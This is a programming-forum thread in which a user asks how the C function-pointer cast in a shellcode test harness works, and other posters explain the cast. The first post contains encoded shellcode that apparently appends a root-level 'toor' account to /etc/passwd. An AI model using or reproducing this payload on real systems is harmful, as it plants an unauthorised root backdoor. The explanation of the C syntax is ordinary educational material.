Shellcoding help

Questions about programming languages and debugging
shan75
On the way to fame!
Posts: 32
Joined: 03 Dec 2009, 17:00
Location: india

Shellcoding help

Post by shan75 »

#include <stdio.h>
#include <string.h>

/* raw machine code stored as a byte string */
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x73\x73\x77"
"\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41"
"\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66"
"\x68\x68\x0a\x68\x69\x6e\x2f\x73\x68\x2f\x3a\x2f\x62\x68\x3a\x30"
"\x3a\x3a\x68\x48\x55\x3a\x30\x68\x72\x32\x69\x7a\x68\x44\x7a\x33"
"\x71\x68\x3a\x47\x66\x2e\x68\x74\x6f\x6f\x72\x89\xe1\x6a\x22\x5a"
"\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80";

int main()
{
/* strlen() returns size_t, so the matching format is %zu */
printf("[*] Shellcode - length: %zu\n", strlen(shellcode));
/* cast the array's address to a pointer to function and call it */
(*(void(*)())shellcode)();
return 0;
}
This is a shellcode, but I can't understand this line: (*(void(*)())shellcode)(); What does it actually mean, a function pointer or what? Please explain it to me.

Thanks

Gogeta70
^_^
Posts: 3275
Joined: 25 Jun 2005, 16:00

Re: Shellcoding help

Post by Gogeta70 »

Well, it's definitely a call to execute the shellcode; what confuses me the most is the pointer/dereference operator. So I can't really tell you for sure what that line does.
¯\_(ツ)_/¯ It works on my machine...

shan75
On the way to fame!
Posts: 32
Joined: 03 Dec 2009, 17:00
Location: india

Re: Shellcoding help

Post by shan75 »

Can anyone else help me?

Lundis
Distorter of Reality
Posts: 543
Joined: 22 Aug 2008, 16:00
Location: Deadlock of Awesome

Re: Shellcoding help

Post by Lundis »

It casts the pointer to a function returning and taking no arguments and calls it. It's a bit clearer if you write it on multiple lines:


#include <stdio.h>
#include <string.h>

/* shellcode[] is the byte array declared in the first post */
extern char shellcode[];

int main()
{
	printf("[*] Shellcode - length: %zu\n", strlen(shellcode));
	// cast the string to a function pointer
	void (*func)() = (void(*)())shellcode;
	//dereference the function pointer and call the function
	(*func)();
	return 0;
}
Dereferencing it is optional (on gcc at least) and doesn't really make any sense to me.
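The cast Lundis explains, worked through as an added example that is not part of the thread: the post's expression is applied to a pointer at a real C function (`marker`, a hypothetical stand-in for the byte array) so it can be run safely, and it shows why the explicit `*` is optional: dereferencing a function pointer yields a function designator, which decays straight back to a pointer. The names `marker`, `entry_fn`, `marker_as_bytes` and `call_through_cast` are assumptions made here, not from the post.

```c
#include <stdio.h>
#include <stdint.h>

static int marker_calls = 0;   /* how many calls reached the target */

/* Stand-in for the byte array: a real function with the shape the cast
   assumes, "returns void, takes no arguments". */
static void marker(void)
{
    marker_calls++;
}

typedef void (*entry_fn)(void);   /* same type as void (*)() */

/* Byte pointer to marker's code, playing the role of `shellcode` in the post.
   Going through uintptr_t keeps the conversion within what ISO C permits. */
const char *marker_as_bytes(void)
{
    return (const char *)(uintptr_t)marker;
}

/* Applies the post's expression to p three ways and returns the call count. */
int call_through_cast(const char *p)
{
    marker_calls = 0;
    /* 1. Exactly as in the post: cast p to "pointer to function returning
          void", dereference it to get the function, then call it. */
    (*(void (*)())p)();
    /* 2. Without the '*': a function pointer in call position is called
          directly, which is why the dereference is optional. */
    ((void (*)())p)();
    /* 3. Extra '*' are harmless too: *fp yields the function designator,
          which immediately decays back to a pointer to the function. */
    entry_fn fp = (entry_fn)p;
    (**fp)();
    return marker_calls;   /* 3 */
}

int main(void)
{
    /* The cast never changes memory permissions: applied to a char array in
       the data segment, as in the post, the call only runs where that
       segment is mapped executable. */
    printf("calls landed: %d\n", call_through_cast(marker_as_bytes()));
    return 0;
}
```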
